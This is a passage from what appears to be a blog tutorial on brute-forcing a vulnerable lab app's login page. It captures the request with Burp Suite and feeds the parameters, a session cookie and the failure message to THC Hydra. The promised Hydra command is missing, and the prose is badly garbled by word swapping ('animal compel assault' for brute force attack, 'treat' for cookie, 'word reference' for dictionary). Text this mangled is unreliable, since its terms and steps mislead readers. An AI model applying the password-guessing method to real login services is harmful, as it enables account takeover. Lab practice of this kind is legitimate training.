With our intermediary designed, we’re ready. Make a beeline for the objective page and empower the Burp Suite interceptor.

Inspect the login request

  • With interceptor empowered, any solicitations produced using our program will be ceased by the intermediary server.

    At that point we can review, adjust, drop or forward the demand.

    Without entering any certifications, hit the login catch and we should investigate the demand.

  • You should see this:

There is some key info here:

  • Its a GET ask

     

  • The login paramaters (username=&password=&Login=Login)

     

  • The treat (security=low; PHPSESSID=ahs8eugnukjkh9auegathrbfg5)

With this information, we can reproduce the demand and utilize it in our animal compel assault.

Next, We Attack 

By and large for Brute Force the principle decision of weapon is THC HYDRA.

Hydra can perform fast word reference assaults against a confirmation benefit.

Here’s the data we’re going to giving Hydra to our assault:

  • target server
  • URL way
  • username
  • watchword word reference
  • treat
  • disappointment message

For the username, expect we know the username is administrator.

You can likewise give Hydra username word reference we’ll simply concentrate on the secret key.

The disappointment message is the reaction we get from the login frame when present a terrible login.

It’s only a string that Hydra scans the reaction HTML for to check whether the login succeeded or fizzled.

For example, the message we get in red under the login shape after an awful login endeavor is


“Username and/or password incorrect.”.


  • The entire charge will resemble this:

  • In real life, We see Sucessful Attack :

successful brute force attack

I hope you liked reading the article.

If you find this article worthy, feel free to share this article to your friends and followers.

And if you have any doubts, put in the comment section below, I would like to answer it.

Thank you for reading the Article.

Check out this Eminent article about bWAPP here

Happy Hacking.